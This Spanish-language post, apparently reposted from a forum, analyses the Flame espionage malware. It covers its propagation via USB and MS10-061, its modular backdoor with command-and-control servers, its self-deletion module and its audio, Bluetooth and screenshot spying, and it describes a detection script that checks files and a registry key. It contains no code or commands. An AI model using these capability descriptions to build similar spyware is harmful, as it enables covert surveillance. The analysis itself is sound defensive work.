Como ya he comentado anteriormente, se trata de un malware de una sofisticación técnica comparable a la encontrada en Stuxnet y DuQu (forma de propagación, objetivos concretos evitando un ataque masivo, posible uso de vulnerabilidades de tipo 0day, etc).

A pesar de que el concepto de Flame es diferente frente a los otros dos (se puede caracterizar como una toolkit configurable para cada objetivo), se cree que puede tratarse de un proyecto paralelo del mismo contratista detrás de ellos.

Para darle credibilidad a esta postura, se hace hincapié en que utiliza las mismas vulnerabilidades para su propagación (usb, vulnerabilidades en impresoras print_spooler - MS10-061) y por tanto, que tuvieran ambos equipos de desarrollo acceso al mismo "kit de exploits".

Aun así, en el caso de Flame estos mecanismos de propagación están deshabilitados por defecto para evitar una infección masiva y que pudiese ser detectado (aunque no se descarta que en las primeras versiones estuviera habilitado y a raíz de que se parchearan, se deshabilitaran para evitar ser detectado por los antivirus actualizados). Flame es capaz de infectar equipos Windows 7 up2date, por lo que es posible que incorpore también exploits de tipo 0day (como en el caso de Stuxnet). También se maneja la posibilidad de que se aproveche de un grupo de vulnerabilidades críticas (MS10-033) en la descompresión de medios.

Si atendemos al timeline del descubrimiento del malware, podemos observar como se descubrió hace solamente dos semanas, cuando Kaspersky estudio los reportes de abril sobre un malware en Irán que estaba atacando empresas energéticas del país. Aun así, como comenta Sergio de los Santos en su análisis en Una al día, la primera muestra en VirusTotal data del 15 de mayo de 2011.

Con respecto a las muestras de Irán y Líbano, nos encontraríamos con fechas del 2010. Además, se han descubierto en foros muestras del fichero wavesup3.drv que datan del 2007. A pesar de las fechas que ha estado manejando Kaspersky, ya a principios de mayo MAHER (el CERT nacional iraní) ya compartió con algunas empresas e instituciones una aplicación para detectar si el sistema estaba infectado con este malware. Según comentaron ayer, están a la espera de publicar una herramienta que permita la eliminación de Flame en un sistema infectado.

Con respecto a la infección, Kaspersky maneja cifras en torno al millar de equipos infectados (se trata de una estimación en base al número de sus clientes que ha sido infectado y extrapolando dicho dato a las cifras de los clientes de otras casas de antivirus), y como ya se ha comentado, prácticamente localizados en países de oriente medio. A pesar de esta focalización de los sistemas infectados, no parece que haya ningún objetivo como en el caso de Stuxnet.


Como ya se ha dicho anteriormente, se trata de un malware muy pesado (en torno a los 20mb, frente a los 500kb de Stuxnet), y esto es debido a la cantidad de módulos que puede incorporar a la instalación base y que lo hace configurable para cada objetivo. Realmente, el core del malware pesa 6mb que incluye una media docena de módulos que descomprime, descifra y, una vez cargados, queda a la espera de las ordenes de los servidores de comando y control (aunque mientras, ejecuta las tareas de esos módulos como se comentará más adelante).

Se ha encontrado otra variante de Flame que pesa únicamente 900kb y que, al cargarse, intenta descargar los módulos. Por lo tanto, queda claro que deja abierto un backdoor en el sistema infectado a través del cual se comunica con el servidor, (siempre a través de protocolos cifrados), descarga e instala nuevos módulos y envía la información obtenida.

A pesar de no tener hardcodeado un 'time-to-death', si que dispone de un modulo de 'auto-eliminación' encargado de borrar todo el rastro del malware, ya sean sus binarios o toda la información que haya ido recopilando (capturas de pantalla, grabaciones, tráfico).

Este troyano tiene varios puntos que llaman bastante la atención:
Hay muchas partes escritas en LUA (exótico lenguaje de programación)
Emplea el bluetooth del sistema para identificar otros dispositivos
Tiene capacidad para grabar conversaciones empleando el micrófono del sistema
Permite tomar capturas de pantalla en función de que aplicaciones estén en uso (entre ellas, aplicaciones de mensajería instantánea)
En base a toda la información que ha sido publicada hasta el momento, he realizado un pequeño script que comprueba si tu sistema está o no infectado con Flame.

La aplicación comprueba concretamente la existencia de una serie de ficheros tanto en el directorio windows/system32 como en el windows/temp, la existencia de unas carpetas específicas en "Common Files\Microsoft Shared" y si ha modificado entradas en el registro (concretamente la clave Authentication Packages en "SYSTEM\CurrentControlSet\Control\Lsa\"




La herramienta se puede descargar desde aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Las fuentes consultadas para realizar este recopilatorio han sido:

[1] Una al dia
[2] MAHER, Iranian National CERT
[3] Wired
[4] Crysys
[5] Securelist I / Securelist II

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta